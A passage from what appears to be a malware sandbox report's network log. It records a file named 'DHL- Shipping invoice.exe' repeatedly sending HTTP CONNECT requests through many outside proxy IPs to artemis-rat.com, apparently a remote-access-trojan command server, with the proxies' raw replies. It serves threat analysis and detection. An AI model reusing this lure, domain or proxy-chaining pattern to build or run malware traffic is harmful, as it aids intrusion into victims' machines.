                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1850192.168.2.45474051.79.87.144412306484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.083141088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1851192.168.2.4553868.142.3.14533066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.086983919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1852192.168.2.455501104.16.105.207806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.090055943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.177295923 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1853192.168.2.455513172.67.181.197806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.099292994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.187247038 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1854192.168.2.450732156.67.214.232806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.106463909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.265613079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.359428883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.359560013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:31.453783989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:43.452951908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:55.452903032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:19.562315941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1855192.168.2.45350045.188.164.4819946484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.106575012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.370937109 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1856192.168.2.455392128.199.202.12280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.108632088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.219011068 CET28INHTTP/1.1 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1857192.168.2.45353892.204.135.37335216484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.110563993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453237057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953309059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.562746048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.932571888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.141035080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.453325033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.890454054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.750247955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1858192.168.2.45083036.255.211.1554386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.113097906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1859192.168.2.455347103.86.109.38806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.117115021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1860192.168.2.45466323.225.72.12535036484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.120522022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.265614033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.620500088 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1861192.168.2.455410134.209.105.20931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.129987955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.146512032 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1862192.168.2.455363222.220.102.15980006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.162024975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953357935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1863192.168.2.450838148.72.209.174394586484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.170180082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1864192.168.2.455440154.12.178.107299856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.170300961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1865192.168.2.45549495.164.89.12388886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.170360088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.343204975 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1866192.168.2.455495188.166.17.1888816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.170361042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1867192.168.2.455520104.19.120.84806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.171504021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.258380890 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1868192.168.2.450734218.57.210.18690026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.171552896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.265762091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.638628960 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:19:30 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1869192.168.2.45541545.195.149.7910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.187349081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1870192.168.2.453592132.148.167.243295146484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.188535929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.640821934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.104275942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.047019958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.950365067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.736368895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1871192.168.2.455353103.231.45.14510806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.189894915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1872192.168.2.45107892.204.134.38297186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.193586111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.265871048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1873192.168.2.453594160.153.254.240485026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.193856955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.250149012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.250169992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.250500917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:31.249769926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:43.250370026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
